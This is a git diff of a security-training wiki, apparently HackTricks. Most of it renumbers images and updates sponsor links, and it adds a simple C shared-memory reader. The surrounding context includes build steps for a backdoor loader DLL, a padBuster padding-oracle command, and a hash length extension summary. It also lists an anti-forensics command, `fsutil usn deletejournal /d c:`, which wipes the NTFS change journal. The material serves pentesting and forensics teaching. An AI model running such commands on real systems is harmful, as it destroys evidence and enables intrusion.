 #### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
 
-![](<../.gitbook/assets/image (97).png>)
+![](<../.gitbook/assets/image (100).png>)
 
 In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
 
@@ -119,7 +119,7 @@ In your project folder have appeared the files: **DllExport.bat** and **DllExpor
 
 Press **Uninstall** (yeah, its weird but trust me, it is necessary)
 
-![](<../.gitbook/assets/image (94).png>)
+![](<../.gitbook/assets/image (97).png>)
 
 ### **Exit Visual Studio and execute DllExport\_configure**
 
@@ -129,23 +129,23 @@ Then, go to your **SalseoLoader folder** and **execute DllExport\_Configure.bat*
 
 Select **x64** (if you are going to use it inside a x64 box, that was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport**) and press **Apply**
 
-![](<../.gitbook/assets/image (879).png>)
+![](<../.gitbook/assets/image (882).png>)
 
 ### **Open the project again with visual Studio**
 
 **\[DllExport]** should not be longer marked as error
 
-![](<../.gitbook/assets/image (667).png>)
+![](<../.gitbook/assets/image (670).png>)
 
 ### Build the solution
 
 Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
 
-![](<../.gitbook/assets/image (844).png>)
+![](<../.gitbook/assets/image (847).png>)
 
 Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> Platform target = x64)
 
-![](<../.gitbook/assets/image (282).png>)
+![](<../.gitbook/assets/image (285).png>)
 
 To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear)
 
diff --git a/consumer b/consumer
new file mode 100755
index 000000000..637af6e1a
Binary files /dev/null and b/consumer differ
diff --git a/consumer.c b/consumer.c
new file mode 100644
index 000000000..06e10761f
--- /dev/null
+++ b/consumer.c
@@ -0,0 +1,37 @@
+// gcc consumer.c -o consumer -lrt
+#include <fcntl.h>
+#include <sys/mman.h>
+#include <sys/stat.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+int main() {
+    const char *name = "/my_shared_memory";
+    const int SIZE = 4096; // Size of the shared memory object
+
+    // Open the shared memory object
+    int shm_fd = shm_open(name, O_RDONLY, 0666);
+    if (shm_fd == -1) {
+        perror("shm_open");
+        return EXIT_FAILURE;
+    }
+
+    // Memory map the shared memory
+    void *ptr = mmap(0, SIZE, PROT_READ, MAP_SHARED, shm_fd, 0);
+    if (ptr == MAP_FAILED) {
+        perror("mmap");
+        return EXIT_FAILURE;
+    }
+
+    // Read from the shared memory
+    printf("Consumer received: %s\n", (char *)ptr);
+
+    // Cleanup
+    munmap(ptr, SIZE);
+    close(shm_fd);
+    shm_unlink(name); // Optionally unlink
+
+    return 0;
+}
+
diff --git a/crypto-and-stego/certificates.md b/crypto-and-stego/certificates.md
index 40a043614..bb4c4ec84 100644
--- a/crypto-and-stego/certificates.md
+++ b/crypto-and-stego/certificates.md
@@ -14,13 +14,13 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=certificates) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=certificates" %}
 
 ## What is a Certificate
 
@@ -196,13 +196,13 @@ openssl pkcs12 -export -in certificatename.cer -inkey privateKey.key -out certif
 
 ***
 
-<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=certificates) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=certificates" %}
 
 <details>
 
diff --git a/crypto-and-stego/cryptographic-algorithms/README.md b/crypto-and-stego/cryptographic-algorithms/README.md
index 09008cb33..96cb122b1 100644
--- a/crypto-and-stego/cryptographic-algorithms/README.md
+++ b/crypto-and-stego/cryptographic-algorithms/README.md
@@ -26,7 +26,7 @@ If you ends in a code **using shift rights and lefts, xors and several arithmeti
 
 If this function is used, you can find which **algorithm is being used** checking the value of the second parameter:
 
-![](<../../.gitbook/assets/image (153).png>)
+![](<../../.gitbook/assets/image (156).png>)
 
 Check here the table of possible algorithms and their assigned values: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
 
@@ -42,7 +42,7 @@ From [the docs](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-
 
 Initiates the hashing of a stream of data. If this function is used, you can find which **algorithm is being used** checking the value of the second parameter:
 
-![](<../../.gitbook/assets/image (546).png>)
+![](<../../.gitbook/assets/image (549).png>)
 
 \
 Check here the table of possible algorithms and their assigned values: [https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id](https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id)
@@ -51,11 +51,11 @@ Check here the table of possible algorithms and their assigned values: [https://
 
 Sometimes it's really easy to identify an algorithm thanks to the fact that it needs to use a special and unique value.
 
-![](<../../.gitbook/assets/image (830).png>)
+![](<../../.gitbook/assets/image (833).png>)
 
 If you search for the first constant in Google this is what you get:
 
-![](<../../.gitbook/assets/image (526).png>)
+![](<../../.gitbook/assets/image (529).png>)
 
 Therefore, you can assume that the decompiled function is a **sha256 calculator.**\
 You can search any of the other constants and you will obtain (probably) the same result.
@@ -65,7 +65,7 @@ You can search any of the other constants and you will obtain (probably) the sam
 If the code doesn't have any significant constant it may be **loading information from the .data section**.\
 You can access that data, **group the first dword** and search for it in google as we have done in the section before:
 
-![](<../../.gitbook/assets/image (528).png>)
+![](<../../.gitbook/assets/image (531).png>)
 
 In this case, if you look for **0xA56363C6** you can find that it's related to the **tables of the AES algorithm**.
 
@@ -85,15 +85,15 @@ It's composed of 3 main parts:
 
 ### **Initialization stage/Substitution Box:** (Note the number 256 used as counter and how a 0 is written in each place of the 256 chars)
 
-![](<../../.gitbook/assets/image (581).png>)
+![](<../../.gitbook/assets/image (584).png>)
 
 ### **Scrambling Stage:**
 
-![](<../../.gitbook/assets/image (832).png>)
+![](<../../.gitbook/assets/image (835).png>)
 
 ### **XOR Stage:**
 
-![](<../../.gitbook/assets/image (901).png>)
+![](<../../.gitbook/assets/image (904).png>)
 
 ## **AES (Symmetric Crypt)**
 
@@ -105,7 +105,7 @@ It's composed of 3 main parts:
 
 ### SBox constants
 
-![](<../../.gitbook/assets/image (205).png>)
+![](<../../.gitbook/assets/image (208).png>)
 
 ## Serpent **(Symmetric Crypt)**
 
@@ -119,11 +119,11 @@ It's composed of 3 main parts:
 In the following image notice how the constant **0x9E3779B9** is used (note that this constant is also used by other crypto algorithms like **TEA** -Tiny Encryption Algorithm).\
 Also note the **size of the loop** (**132**) and the **number of XOR operations** in the **disassembly** instructions and in the **code** example:
 
-![](<../../.gitbook/assets/image (544).png>)
+![](<../../.gitbook/assets/image (547).png>)
 
 As it was mentioned before, this code can be visualized inside any decompiler as a **very long function** as there **aren't jumps** inside of it. The decompiled code can look like the following:
 
-![](<../../.gitbook/assets/image (510).png>)
+![](<../../.gitbook/assets/image (513).png>)
 
 Therefore, it's possible to identify this algorithm checking the **magic number** and the **initial XORs**, seeing a **very long function** and **comparing** some **instructions** of the long function **with an implementation** (like the shift left by 7 and the rotate left by 22).
 
@@ -137,7 +137,7 @@ Therefore, it's possible to identify this algorithm checking the **magic number*
 
 ### Identifying by comparisons
 
-![](<../../.gitbook/assets/image (1110).png>)
+![](<../../.gitbook/assets/image (1113).png>)
 
 * In line 11 (left) there is a `+7) >> 3` which is the same as in line 35 (right): `+7) / 8`
 * Line 12 (left) is checking if `modulus_len < 0x040` and in line 36 (right) it's checking if `inputLen+11 > modulusLen`
@@ -155,7 +155,7 @@ Therefore, it's possible to identify this algorithm checking the **magic number*
 
 You can identify both of them checking the constants. Note that the sha\_init has 1 constant that MD5 doesn't have:
 
-![](<../../.gitbook/assets/image (403).png>)
+![](<../../.gitbook/assets/image (406).png>)
 
 **MD5 Transform**
 
@@ -172,11 +172,11 @@ Note the use of more constants
 
 Check **lookup table constants**:
 
-![](<../../.gitbook/assets/image (505).png>)
+![](<../../.gitbook/assets/image (508).png>)
 
 A CRC hash algorithm looks like:
 
-![](<../../.gitbook/assets/image (387).png>)
+![](<../../.gitbook/assets/image (391).png>)
 
 ## APLib (Compression)
 
@@ -193,7 +193,7 @@ The graph is quiet large:
 
 Check **3 comparisons to recognise it**:
 
-![](<../../.gitbook/assets/image (427).png>)
+![](<../../.gitbook/assets/image (430).png>)
 
 <details>
 
diff --git a/crypto-and-stego/esoteric-languages.md b/crypto-and-stego/esoteric-languages.md
index 7e026fa79..dd7b853c4 100644
--- a/crypto-and-stego/esoteric-languages.md
+++ b/crypto-and-stego/esoteric-languages.md
@@ -27,7 +27,7 @@ Check that wiki to search more esotreic languages
 
 ## npiet
 
-![](<../.gitbook/assets/image (688).png>)
+![](<../.gitbook/assets/image (691).png>)
 
 [https://www.bertnase.de/npiet/npiet-execute.php](https://www.bertnase.de/npiet/npiet-execute.php)
 
diff --git a/crypto-and-stego/hash-length-extension-attack.md b/crypto-and-stego/hash-length-extension-attack.md
index ba17ef3ea..fb60efadc 100644
--- a/crypto-and-stego/hash-length-extension-attack.md
+++ b/crypto-and-stego/hash-length-extension-attack.md
@@ -1,4 +1,4 @@
-
+# Hash Length Extension Attack
 
 <details>
 
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -26,10 +26,9 @@ You can check their website and try their engine for **free** at:
 
 {% embed url="https://whiteintel.io" %}
 
----
+***
 
-
-# Summary of the attack
+## Summary of the attack
 
 Imagine a server which is **signing** some **data** by **appending** a **secret** to some known clear text data and then hashing that data. If you know:
 
@@ -42,7 +41,7 @@ Imagine a server which is **signing** some **data** by **appending** a **secret*
 
 Then, it's possible for an **attacker** to **append** **data** and **generate** a valid **signature** for the **previos data + appended data**.
 
-## How?
+### How?
 
 Basically the vulnerable algorithms generate the hashes by firstly **hashing a block of data**, and then, **from** the **previously** created **hash** (state), they **add the next block of data** and **hash it**.
 
@@ -54,17 +53,17 @@ If an attacker wants to append the string "append" he can:
 * Append the string "append"
 * Finish the hash and the resulting hash will be a **valid one for "secret" + "data" + "padding" + "append"**
 
-## **Tool**
+### **Tool**
 
 {% embed url="https://github.com/iagox86/hash_extender" %}
 
-## References
+### References
 
 You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
 
-### [WhiteIntel](https://whiteintel.io)
+#### [WhiteIntel](https://whiteintel.io)
 
-<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
 
 [**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
 
@@ -83,9 +82,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
-
-
diff --git a/crypto-and-stego/padding-oracle-priv.md b/crypto-and-stego/padding-oracle-priv.md
index f1678ff0f..0dad32c30 100644
--- a/crypto-and-stego/padding-oracle-priv.md
+++ b/crypto-and-stego/padding-oracle-priv.md
@@ -80,7 +80,7 @@ perl ./padBuster.pl http://10.10.10.10/index.php "" 8 -encoding 0 -cookies "hcon
 
 In **summary**, you can start decrypting the encrypted data by guessing the correct values that can be used to create all the **different paddings**. Then, the padding oracle attack will start decrypting bytes from the end to the start by guessing which will be the correct value that **creates a padding of 1, 2, 3, etc**.
 
-![](<../.gitbook/assets/image (558).png>)
+![](<../.gitbook/assets/image (561).png>)
 
 Imagine you have some encrypted text that occupies **2 blocks** formed by the bytes from **E0 to E15**.\
 In order to **decrypt** the **last** **block** (**E8** to **E15**), the whole block passes through the "block cipher decryption" generating the **intermediary bytes I0 to I15**.\
diff --git a/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/forensics/basic-forensic-methodology/anti-forensic-techniques.md
index 1db2b7f7c..d102c9df9 100644
--- a/forensics/basic-forensic-methodology/anti-forensic-techniques.md
+++ b/forensics/basic-forensic-methodology/anti-forensic-techniques.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -167,7 +167,7 @@ It's also possible to modify the configuration of which files are going to be co
 
 * `fsutil usn deletejournal /d c:`
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md
index 113e63371..2f6657be0 100644
--- a/forensics/basic-forensic-methodology/windows-forensics/README.md
+++ b/forensics/basic-forensic-methodology/windows-forensics/README.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -514,7 +514,7 @@ EventID 6005 indicates system startup, while EventID 6006 marks shutdown.
 
 Security EventID 1102 signals the deletion of logs, a critical event for forensic analysis.
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md b/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md
index 2e1d117e5..f9e11e395 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md
@@ -31,7 +31,7 @@ This tool **modifies** the timestamp information inside **`$STANDARD_INFORMATION
 
 The **USN Journal** (Update Sequence Number Journal) is a feature of the NTFS (Windows NT file system) that keeps track of volume changes. The [**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) tool allows for the examination of these changes.
 
-![](<../../.gitbook/assets/image (798).png>)
+![](<../../.gitbook/assets/image (801).png>)
 
 The previous image is the **output** shown by the **tool** where it can be observed that some **changes were performed** to the file.
 
@@ -39,13 +39,13 @@ The previous image is the **output** shown by the **tool** where it can be obser
 
 **All metadata changes to a file system are logged** in a process known as [write-ahead logging](https://en.wikipedia.org/wiki/Write-ahead\_logging). The logged metadata is kept in a file named `**$LogFile**`, located in the root directory of an NTFS file system. Tools such as [LogFileParser](https://github.com/jschicht/LogFileParser) can be used to parse this file and identify changes.
 
-![](<../../.gitbook/assets/image (134).png>)
+![](<../../.gitbook/assets/image (137).png>)
 
 Again, in the output of the tool it's possible to see that **some changes were performed**.
 
 Using the same tool it's possible to identify to **which time the timestamps were modified**:
 
-![](<../../.gitbook/assets/image (1086).png>)
+![](<../../.gitbook/assets/image (1089).png>)
 
 * CTIME: File's creation time
 * ATIME: File's modification time
@@ -70,7 +70,7 @@ NFTS uses a cluster and the minimum information size. That means that if a file
 
 There are tools like slacker that allow hiding data in this "hidden" space. However, an analysis of the `$logfile` and `$usnjrnl` can show that some data was added:
 
-![](<../../.gitbook/assets/image (1057).png>)
+![](<../../.gitbook/assets/image (1060).png>)
 
 Then, it's possible to retrieve the slack space using tools like FTK Imager. Note that this kind of tool can save the content obfuscated or even encrypted.
 
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
index fabb1028f..f9df47842 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md
@@ -12,7 +12,7 @@
 
 </details>
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
@@ -124,7 +124,7 @@ Note that sector size is **512** and start is **2048**. Then mount the image lik
 mount disk.img /mnt -o ro,offset=$((2048*512))
 ```
 
-<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
+<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
 
 {% embed url="https://websec.nl/" %}
 
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md b/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md
index e6988ba67..2ffe45b11 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md
@@ -1,12 +1,12 @@
 # Linux Forensics
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %}
 
 <details>
 
@@ -163,13 +163,13 @@ icat -i raw -f ext4 disk.img 16
 ThisisTheMasterSecret
 ```
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %}
 
 ## Search for known Malware
 
@@ -213,13 +213,13 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not"
 find / -type f -executable | grep <something>
 ```
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %}
 
 ## Recover Deleted Running Binaries
 
@@ -357,13 +357,13 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
 
 More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %}
 
 ## Review User Accounts and Logon Activities
 
@@ -456,10 +456,10 @@ Do you work in a **cybersecurity company**? Do you want to see your **company ad
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=linux-forensics) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
 Get Access Today:
 
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=linux-forensics" %}
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md
index 927e4ec43..15e14a1b1 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md
@@ -32,17 +32,17 @@ Start **searching** for **malware** inside the pcap. Use the **tools** mentioned
 
 When the dump is small (just some KB, maybe a few MB) then it's probably a mini dump crash report and not a memory dump.
 
-![](<../../../.gitbook/assets/image (529).png>)
+![](<../../../.gitbook/assets/image (532).png>)
 
 If you have Visual Studio installed, you can open this file and bind some basic information like process name, architecture, exception info and modules being executed:
 
-![](<../../../.gitbook/assets/image (260).png>)
+![](<../../../.gitbook/assets/image (263).png>)
 
 You can also load the exception and see the decompiled instructions
 
-![](<../../../.gitbook/assets/image (139).png>)
+![](<../../../.gitbook/assets/image (142).png>)
 
-![](<../../../.gitbook/assets/image (607).png>)
+![](<../../../.gitbook/assets/image (610).png>)
 
 Anyway, Visual Studio isn't the best tool to perform an analysis of the depth of the dump.
 
diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md b/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md
index 3c38bcd38..f17b8e050 100644
--- a/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md
+++ b/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md
@@ -25,13 +25,13 @@ It's allocated in the **first sector of the disk after the 446B of the boot code
 It allows up to **4 partitions** (at most **just 1** can be active/**bootable**). However, if you need more partitions you can use **extended partitions**. The **final byte** of this first sector is the boot record signature **0x55AA**. Only one partition can be marked as active.\
 MBR allows **max 2.2TB**.
 
-![](<../../../.gitbook/assets/image (347).png>)
+![](<../../../.gitbook/assets/image (350).png>)
 
-![](<../../../.gitbook/assets/image (301).png>)
+![](<../../../.gitbook/assets/image (304).png>)
 
 From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Signature** (if Windows is used). The logical drive letter of the hard disk depends on the Windows Disk Signature. Changing this signature could prevent Windows from booting (tool: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**.
 
-![](<../../../.gitbook/assets/image (306).png>)
+![](<../../../.gitbook/assets/image (310).png>)
 
 **Format**
 
@@ -93,7 +93,7 @@ The GUID Partition Table, known as GPT, is favored for its enhanced capabilities
 
 * GPT maintains backward compatibility through a protective MBR. This feature resides in the legacy MBR space but is designed to prevent older MBR-based utilities from mistakenly overwriting GPT disks, hence safeguarding the data integrity on GPT-formatted disks.
 
-![https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/GUID\_Partition\_Table\_Scheme.svg/800px-GUID\_Partition\_Table\_Scheme.svg.png](<../../../.gitbook/assets/image (1059).png>)
+![https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/GUID\_Partition\_Table\_Scheme.svg/800px-GUID\_Partition\_Table\_Scheme.svg.png](<../../../.gitbook/assets/image (1062).png>)
 
 **Hybrid MBR (LBA 0 + GPT)**
 
@@ -139,7 +139,7 @@ The partition table header defines the usable blocks on the disk. It also define
 
 **Partitions Types**
 
-![](<../../../.gitbook/assets/image (80).png>)
+![](<../../../.gitbook/assets/image (83).png>)
 
 More partition types in [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID\_Partition\_Table)
 
@@ -147,7 +147,7 @@ More partition types in [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](h
 
 After mounting the forensics image with [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), you can inspect the first sector using the Windows tool [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In the following image an **MBR** was detected on the **sector 0** and interpreted:
 
-![](<../../../.gitbook/assets/image (351).png>)
+![](<../../../.gitbook/assets/image (354).png>)
 
